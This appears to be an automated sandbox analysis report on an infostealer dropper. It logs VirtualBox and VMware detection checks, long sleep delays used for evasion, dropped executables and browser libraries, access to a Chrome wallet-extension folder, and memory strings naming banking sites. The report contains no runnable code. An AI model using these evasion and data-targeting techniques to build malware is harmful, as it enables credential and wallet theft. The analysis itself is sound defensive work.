Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory allocated: 4AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory allocated: 3030000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 17D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 32A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1400000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2E10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C50000 memory reserve \| memory write watch

Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 3947

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_7-4286

Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcr120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-JR9V0.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-4H4R9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-0K04O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libmp3lame.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-QM7CF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-P12J5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-IK2RF.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lumma2806[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AAAAKJKJEB.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-18MLT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-RPUL3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\openh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\FCBFBGDBKJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-TJFT6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libcurl.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\avdevice-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-VCOE9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-07TP8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\QtAVWidgets1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Svg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mousehelper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-O6M3F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-LRHSQ.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlt[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\amadka[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-9A6KK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-B37O4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-NPF14.tmp	Jump to dropped file

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_8-6443

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

API coverage: 0.8 %

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe TID: 2436	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe TID: 5884	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe TID: 2244	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe TID: 2244	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe TID: 3884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe TID: 1396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5820	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6280	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Code function: 8_2_00409A14 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

8_2_00409A14

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: JUxvupfc339huwQeMul
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: vmware
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
